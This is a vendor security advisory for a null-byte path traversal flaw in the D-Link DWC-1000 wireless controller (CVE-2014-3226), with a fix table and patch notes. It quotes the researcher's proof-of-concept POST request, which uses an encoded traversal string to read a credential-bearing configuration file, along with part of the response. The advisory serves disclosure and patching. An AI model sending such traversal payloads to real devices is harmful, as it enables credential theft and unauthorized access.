• Home Support Forums Security Advisories Shop     English | French
Security Announcement
Announcement > SAP10026
DWC-1000 - Rev. Ax - Relative Path Traversal Attack (Null Byte) - (F/W 4.2.0.6_WW and Older)
Publication ID: SAP10026
Resolved Status: Yes
Published on: 10 May 2014 12:08 GMT
Last updated on: 2 July 2014 6:17 GMT

Overview

 

The DWC-1000 Rev. Ax  is a wireless controller by D-Link used to control, manage, optimize coverage of multiple D-Link access points on the same network. Access points supported by the DWC-1000 are DWL-2600AP, DWL-3600AP, DWL-6600AP, and DWL-8600AP and are not affected by this advisory.


The DWC-10000 contains a flaw exploited by a null byte injection attack in the URL that allows directory/file/path traversal.  All files on the system can be seen, including but not limited to /etc/shadow, /etc/passwd and temporary configuration files.  A malicious user can successfully logon using the credentials stored within some of the files, which may lead to unauthorized configuration changes and/or the device becoming unstable.

 

 

References

 

Holistic Security Consulting Gmbh - Contacted directly though security@dlink.com - March 25, 2014

 

CVE-2014-3226

 

Description 

 

In order to maintain author's intent of the disclosure please contact them for further details and questions: https://www.holisticsec.com

 

The following is stated directly from the original report by  Holistic Security Consulting Gmbh

  

===================================
== Proof-of-Concept Request
===================================

POST /platform.cgi HTTP/1.1
Host: 192.168.7.2
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
 
thispage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fteamf1.cfg.ascii%00index.htm&Users.UserName=admin&Users.Password=b&button.login.Users.deviceStatus=Login


===================================
== Proof-of-Concept Response
===================================

The following file contains credentials and everything.

HTTP/1.1 200 OK
Date: Tue, 25 Mar 2014 15:50:42 GMT
Server: Light Weight Web Server
Content-Length: 143011
 
CaptivePortal = {}
CaptivePortal[1] = {}
CaptivePortal[1]["enable"] = "0"
CaptivePortal[1]["_ROWID_"] = "1"
cpGlobalMode = {}
cpGlobalMode[1] = {}
cpGlobalMode[1]["cpMode"] = "1"
CaptivePortalVlan = {}
CaptivePortalSSID = {}
CaptivePortalSSID[1] = {}
CaptivePortalSSID[1]["ssid"] = "Company_Intern"

Affected Product

   

Model Name

HW Version

Current FW Version

New FW Version for this exploit fix

DWC-1000

Ax

v. 4.2.0.6_WW and older

FW: 4.2.0.6b303_WW

Release Notes: Link

 

Security patch for your D-Link Devices

 

These firmware updates address the security vulnerabilities in affected D-Link devices. D-Link will update this continually and we strongly recommend all users to install the relevant updates.

 

As there are different hardware revisions on our products, please check this on your device before downloading the correct corresponding firmware update. The hardware revision information can usually be found on the product label on the underside of the product next to the serial number. Alternatively, they can also be found on the device web configuration.